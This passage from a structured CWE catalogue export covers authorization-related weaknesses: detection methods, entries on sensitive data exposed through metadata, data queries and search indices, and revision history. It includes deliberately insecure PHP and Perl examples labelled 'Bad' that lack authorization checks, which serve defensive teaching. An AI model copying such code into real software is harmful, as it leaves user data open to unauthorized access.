"Effectiveness": "Limited",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "\n\nThis weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.\n\n\nSpecifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.\n",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.",
"Method": "Manual Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost Application Interface Scanner\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer\n\t\tForced Path Execution\n\t\tMonitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source\n\t\tManual Source Code Review (not inspections)",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This function runs an arbitrary SQL query on a given database, returning the result of the query.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tfunction runEmployeeQuery($dbName, $name){\n\t\tmysql_select_db($dbName,$globalDbHandle) or die(\"Could not open Database\".$dbName);\n```\n//Use a prepared statement to avoid CWE-89* \n\t\t$preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');\n\t\t$preparedStatement->execute(array(':name' => $name));\n\t\treturn $preparedStatement->fetchAll();}\n\t\n\t */.../* \n\t\n\t$employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']);",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-95"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tsub DisplayPrivateMessage {\n\t\tmy($id) = @_;\n\t\tmy $Message = LookupMessageObject($id);\n\t\tprint \"From: \" . encodeHTML($Message->{from}) . \"<br>\\n\";\n\t\tprint \"Subject: \" . encodeHTML($Message->{subject}) . \"\\n\";\n\t\tprint \"<hr>\\n\";\n\t\tprint \"Body: \" . encodeHTML($Message->{body}) . \"\\n\";\n\t}\n\tmy $q = new CGI;\n```\n# For purposes of this example, assume that CWE-309 and* \n\t\n\t\n\t\n\t *# CWE-523 do not apply.* \n\tif (! AuthenticateUser($q->param('username'), $q->param('password'))) {\n\t```\n\t\tExitError(\"invalid username or password\");\n\t}\n\tmy $id = $q->param('id');\n\tDisplayPrivateMessage($id);\n```",
"IntroText": null,
"Language": "Perl",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "One way to avoid this problem would be to ensure that the \"to\" field in the message object matches the username of the authenticated user.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-96"
}
] | null | null |
High
|
[
"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \"No access\", \"Read access\", \"Change access\", and \"Full control\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."
] | 1
|
[
[
"284",
"285"
]
] |
[
"1230",
"1256",
"1297",
"1328",
"552",
"732",
"862",
"863",
"926",
"927"
] |
1230
|
Exposure of Sensitive Information Through Metadata
|
Base
|
Simple
|
Incomplete
|
The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.
|
Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources. If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details. For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
}
] | null | null | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-01-26",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"285",
"1230"
]
] |
[
"202",
"612"
] |
202
|
Exposure of Sensitive Information Through Data Queries
|
Base
|
Simple
|
Draft
|
When trying to keep information confidential, an attacker can often infer some of the information by using statistics.
|
In situations where data should not be tied to individual users, but a large number of users should be able to make queries that "scrub" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Files or Directories",
"Read Application Data"
],
"Likelihood": null,
"Note": "Sensitive information may possibly be leaked through data queries accidentally.",
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "This is a complex topic. See the book Translucent Databases for a good discussion of best practices.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "Wiki product allows an adversary to discover filenames via a series of queries starting with one letter and then iteratively extending the match.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-41935",
"Reference": "CVE-2022-41935"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Accidental leaking of sensitive information through data queries",
"MappingFit": null,
"TaxonomyName": "CLASP"
}
] | null |
[
{
"Authors": [
"Secure Software, Inc."
],
"Edition": null,
"ExternalReferenceID": "REF-18",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "The CLASP Application Security Process",
"URL": "https://cwe.mitre.org/documents/sources/TheCLASPApplicationSecurityProcess.pdf",
"URLDate": "2024-11-17"
}
] |
[
{
"Note": "\n\nThe relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem. CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users. It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230).\n",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "CLASP",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2013-02-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2017-05-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes, Name, References, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Type",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Data Queries",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Privacy Leak through Data Queries",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Exposure of Sensitive Data Through Data Queries",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "1230",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "See the book Translucent Databases for examples.",
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null |
Medium
| null | 1
|
[
[
"284",
"285",
"1230",
"202"
]
] |
[] |
612
|
Improper Authorization of Index Containing Sensitive Information
|
Base
|
Simple
|
Draft
|
The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.
|
Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search. If the index's results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results. The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] | null |
[
{
"Description": "A search application's access control rules are not properly applied to indices for data streams, allowing for the viewing of sensitive information.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-41918",
"Reference": "CVE-2022-41918"
}
] | null |
[
{
"EntryID": "48",
"EntryName": "Insecure Indexing",
"MappingFit": null,
"TaxonomyName": "WASC"
}
] | null |
[
{
"Authors": [
"WASC"
],
"Edition": null,
"ExternalReferenceID": "REF-1050",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Insecure Indexing",
"URL": "http://projects.webappsec.org/w/page/13246937/Insecure%20Indexing",
"URLDate": null
}
] |
[
{
"Note": "This weakness is probably under-studied and under-reported.",
"Type": "Research Gap"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2007-05-07",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2007-05-07",
"SubmissionVersion": "Draft 6",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Other_Notes, Research_Gaps",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
